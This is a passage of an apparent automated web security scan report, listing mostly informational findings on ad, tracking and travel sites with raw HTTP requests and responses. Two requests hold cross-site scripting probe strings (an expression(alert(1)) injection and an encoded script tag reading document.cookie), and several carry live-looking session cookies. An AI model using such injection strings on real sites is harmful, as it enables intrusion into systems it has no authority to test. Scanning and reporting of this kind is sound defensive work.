na_id=&na_mp=&na_mg=BR&na_da=

27.38. http://seg.sharethis.com/getSegment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Request

Response

27.39. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

27.40. http://sr2.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sr2.liveperson.net
Path:	/visitor/addons/deploy.asp

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sr2.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LivePersonID=LP i=16101423669632,d=1294435351;

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 403
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Tue, 01 Feb 2011 15:37:54 GMT
Connection: close

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>
<p>
<font face="Arial
...[SNIP]...

27.41. https://trustsealinfo.verisign.com/splash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trustsealinfo.verisign.com
Path:	/splash

Request

GET /splash HTTP/1.1
Host: trustsealinfo.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 02 Feb 2011 15:42:22 GMT
Accept-Ranges: bytes
ETag: W/"975-1295603920000"
Last-Modified: Fri, 21 Jan 2011 09:58:40 GMT
Content-Type: text/html
Content-Length: 975
Vary: Accept-Encoding
Connection: close

<!doctype html>
<html>
<head>
<title>VeriSign Certified Seal</title>
<link rel="stylesheet" type="text/css" href="style/splash.css"/>
</head>
<body>
<div id="container">
<div i
...[SNIP]...

27.42. http://uac.advertising.com/wrapper/aceUACping.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uac.advertising.com
Path:	/wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BoOqF1EBAAAABAAAAMAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=TPQQMfQBxZgcD514adQ2mjv0dgQLL5F!; ACID=WR910012964108340027; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=qjaRNJ7+AcuoGwwsNiQQoaAc; ROLL=gqwLaPc0+hFCnPF/wmx+n1sA5LOxHdM!;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Cache-Control: max-age=3600
Expires: Wed, 02 Feb 2011 16:11:43 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:42:31 GMT
Content-Length: 2659
Connection: close

<html><head></head><body><script type='text/javascript'>
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

27.43. http://wp-superslider.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/index.php

Request

GET /index.php?wpgb_public_action=query&visit_delta=-1&closed=&logged_in=&referrer=http%3A%2F%2Fburp%2Fshow%2F14&url=http%3A%2F%2Fwp-superslider.com%2F%3F2ce46%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E2b12960bb2%3D1&title=Wp-SuperSlider%20%C2%AB%20Wp-SuperSlider HTTP/1.1
Host: wp-superslider.com
Proxy-Connection: keep-alive
Referer: http://wp-superslider.com/?2ce46%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b12960bb2=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bb2_screener_=1296661497+173.193.214.243; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:45:41 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
Set-Cookie: bb2_screener_=1296661541+173.193.214.243; path=/
Content-Type: text/html
Content-Length: 732

<div class="greet_block wpgb_cornered"><div class="greet_text"><div class="greet_image"><a href="http://wp-superslider.com/?feed=rss" rel="nofollow"><img src="http://wp-superslider.com/site/wp-conten
...[SNIP]...

27.44. http://www.amihackerproof.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amihackerproof.com
Path:	/

Request

GET / HTTP/1.1
Host: www.amihackerproof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.45. http://www.autocheck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/

Request

GET /?WT.mc_id=3499&siteID=3499 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.46. http://www.dillerdesign.com/experiment/DD_belatedPNG/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dillerdesign.com
Path:	/experiment/DD_belatedPNG/

Request

GET /experiment/DD_belatedPNG/ HTTP/1.1
Host: www.dillerdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.47. http://www.ehow.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.co.uk
Path:	/

Request

GET / HTTP/1.1
Host: www.ehow.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.48. http://www.ehow.com/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/xd_receiver.htm

Request

Response

27.49. https://www.ehow.com/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/xd_receiver.htm

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Content-Length: 264
Content-Type: text/html
Content-Location: http://www.ehow.com/xd_receiver.htm
Last-Modified: Tue, 17 Aug 2010 04:48:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Date: Wed, 02 Feb 2011 15:45:18 GMT
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<body>
<script src="http://conn
...[SNIP]...

27.50. http://www.google.com/instant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/instant/

Request

GET /instant/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 07:45:29 GMT
Date: Wed, 02 Feb 2011 15:52:52 GMT
Expires: Wed, 02 Feb 2011 15:52:52 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Google Instant
</title>
<link href="instant.css" rel="stylesheet">
<meta content="Google Instant" nam
...[SNIP]...

27.51. http://www.google.com/intl/en/about.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/intl/en/about.html

Request

GET /intl/en/about.html HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 04:42:49 GMT
Date: Wed, 02 Feb 2011 15:50:28 GMT
Expires: Wed, 02 Feb 2011 15:50:28 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<title>About Google</title>
<link href="http://www.google.com/css/gcs.css" rel="stylesheet">
<style>
h1 {
color:#636363;
float:left;
font
...[SNIP]...

27.52. http://www.google.com/intl/en/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/intl/en/ads/

Request

GET /intl/en/ads/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 01 Feb 2011 22:56:20 GMT
Date: Wed, 02 Feb 2011 15:50:18 GMT
Expires: Wed, 02 Feb 2011 15:50:18 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Welcome to Google Advertising Programs
</title>
<link href="css/styles.css" rel="stylesheet">
<script
...[SNIP]...

27.53. http://www.google.com/intl/en/options/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/intl/en/options/

Request

Response

27.54. http://www.opinionlab.com/ozone/24-7.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opinionlab.com
Path:	/ozone/24-7.asp

Request

GET /ozone/24-7.asp?referer= HTTP/1.1
Host: www.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.55. http://www.orbitz.com/App/ViewDHTMLCalendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewDHTMLCalendar

Request

Response

27.56. http://www.orbitz.com/App/ViewTravelWatchHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewTravelWatchHome

Request

Response

27.57. http://www.orbitz.com/cacheable/ad.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/cacheable/ad.html

Request

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 31 Jan 2011 23:50:42 GMT
ETag: "30a-49b2d156ad880"
Cache-Control: max-age=14400
Expires: Tue, 01 Feb 2011 16:50:25 GMT
Content-Type: text/html
Cteonnt-Length: 778
Server: Apache
Date: Tue, 01 Feb 2011 15:23:18 GMT
Age: 9173
Connection: keep-alive
Content-Length: 778

<html>
   <head></head>
   <body onLoad="window.adLoaded=true;" onUnload="window.adLoaded=false;" style="background-color:transparent">
       <script type="text/javascript">
           function waitForAdURL(timeout)
...[SNIP]...

27.58. http://www.orbitz.com/cacheable/ad_empty.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/cacheable/ad_empty.html

Request

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 31 Jan 2011 23:49:57 GMT
ETag: "2e-49b2d12bc3340"
Cache-Control: max-age=14400
Expires: Tue, 01 Feb 2011 16:50:06 GMT
Content-Type: text/html
ntCoent-Length: 46
Server: Apache
Date: Tue, 01 Feb 2011 15:23:13 GMT
Age: 9187
Connection: keep-alive
Content-Length: 46

<html><head></head><body> </body></html>

27.59. http://www.orbitz.com/cacheable/empty.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/cacheable/empty.html

Request

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 31 Jan 2011 23:50:01 GMT
ETag: "8-49b2d12f93c40"
Cache-Control: max-age=14400
Expires: Tue, 01 Feb 2011 16:54:21 GMT
Content-Type: text/html
Cteonnt-Length: 8
Server: Apache
Date: Tue, 01 Feb 2011 15:23:32 GMT
Age: 8951
Connection: keep-alive
Content-Length: 8

27.60. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/adserverProxy.jsp

Request

Response

27.61. https://www.orbitz.com/Secure/ViewSecureCalendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/ViewSecureCalendar

Request

Response

27.62. http://www.ppcse.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ppcse.net
Path:	/

Request

GET / HTTP/1.1
Host: www.ppcse.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.63. http://www.robtex.com/ext/ads/nb728.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/ext/ads/nb728.html

Request

Response

27.64. http://www.robtex.com/ext/ads/nt728.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/ext/ads/nt728.html

Request

Response

27.65. http://www.stocktrader.org.uk/remote2/ST1- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stocktrader.org.uk
Path:	/remote2/ST1-

Request

GET /remote2/ST1- HTTP/1.1
Host: www.stocktrader.org.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 16:17:12 GMT
Server: Apache/2.0.63 (CentOS)
Last-Modified: Sun, 20 Apr 2008 22:16:15 GMT
ETag: "2310067-3c4-54de49c0"
Accept-Ranges: bytes
Content-Length: 964
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at stocktrader.org.uk
</ADDRESS>
</BODY>
...[SNIP]...

27.66. http://www.stocktrader.org.uk/remote2/ST1-1.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stocktrader.org.uk
Path:	/remote2/ST1-1.php

Request

GET /remote2/ST1-1.php HTTP/1.1
Host: www.stocktrader.org.uk
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:53 GMT
Server: Apache/2.0.63 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 398
Content-Type: text/html

var ws = document.location.href;document.write('<iframe src="http://www.stocktrader.org.uk/remote2/ST1-2.php?ws=' + ws + '&wt=' + wt + '&w=' + w + '&h=' + h + '&bgc=' + bgc + '&tf=' + tf + '&tfs=' + t
...[SNIP]...

27.67. http://www.stocktrader.org.uk/remote2/ST1-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stocktrader.org.uk
Path:	/remote2/ST1-2.php

Request

Response

27.68. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Wed, 02 Feb 2011 16:18:19 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.70. http://www.wizzsurf.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wizzsurf.com
Path:	/

Request

GET / HTTP/1.1
Host: www.wizzsurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.71. http://www.worldmastiffforum.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.worldmastiffforum.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hascookies=1; newvisit=1297002743; lastvisit=1296706072

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 06 Feb 2011 14:32:29 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 571

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.52</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...

27.72. http://xss-proxy.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xss-proxy.sourceforge.net
Path:	/

Request

GET / HTTP/1.1
Host: xss-proxy.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28. HTML uses unrecognised charset previous next
There are 4 instances of this issue:

http://ccc01.opinionlab.com/o.asp
https://faq.orbitz.com/
https://faq.orbitz.com/app/answers/detail/a_id/15644
https://secure.opinionlab.com/ccc01/o.asp

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

28.1. http://ccc01.opinionlab.com/o.asp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://ccc01.opinionlab.com
Path:	/o.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF-16
UTF-8

Request

GET /o.asp?id=swHtlTXj HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.2. https://faq.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	https://faq.orbitz.com
Path:	/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF-8
utf8

Request

GET / HTTP/1.1
Host: faq.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.3. https://faq.orbitz.com/app/answers/detail/a_id/15644 previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	https://faq.orbitz.com
Path:	/app/answers/detail/a_id/15644

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF-8
utf8

Request

GET /app/answers/detail/a_id/15644 HTTP/1.1
Host: faq.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.4. https://secure.opinionlab.com/ccc01/o.asp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	https://secure.opinionlab.com
Path:	/ccc01/o.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF-16
UTF-8

Request

GET /ccc01/o.asp?ID=WpkpVtTB HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29. Content type incorrectly stated previous next
There are 107 instances of this issue:

http://a.rad.msn.com/ADSAdClient31.dll
https://a248.e.akamai.net/demdex.download.akamai.com/dm/
http://a3.twimg.com/profile_images/299906134/acangiano_normal.gif
http://ad.doubleclick.net/clk
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1377911769
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/991035629
https://admin.testandtarget.omniture.com/login_hal.css
https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js
https://admin.testandtarget.omniture.com/skins/omniture/login.css
https://admin.testandtarget.omniture.com/skins/omniture/static_header.css
http://api.blogburst.com/EntityImageHandler.ashx
http://api.blogburst.com/favicon.ico
http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx
http://bannerfarm.ace.advertising.com/bannerfarm/84352/siteIDs.txt
http://blekko.com/autocomplete
http://blekko.com/tag/pref
http://boardreader.com/favicon.ico
http://boardreader.com/linksGraphXML.php
http://boardreader.com/moduleindex.php
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://cdn.demdex.net/dm/
https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
https://gc.synxis.com/XBE/Popups/InfoPopup.aspx
http://hostedusa3.whoson.com/include.js
http://hostedusa3.whoson.com/invite.js
http://investing.money.msn.com/mv/MarketStatus
http://investing.money.msn.com/mv/RecentQuotes/
http://kona5.kontera.com/KonaGet.js
https://leads.demandbase.com/
http://local.msn.com/ten-day.aspx
http://local.msn.com/weather.aspx
https://maps-api-ssl.google.com/maps/api/js
http://maps.google.com/maps/api/js
http://now.eloqua.com/visitor/v200/svrGP.aspx
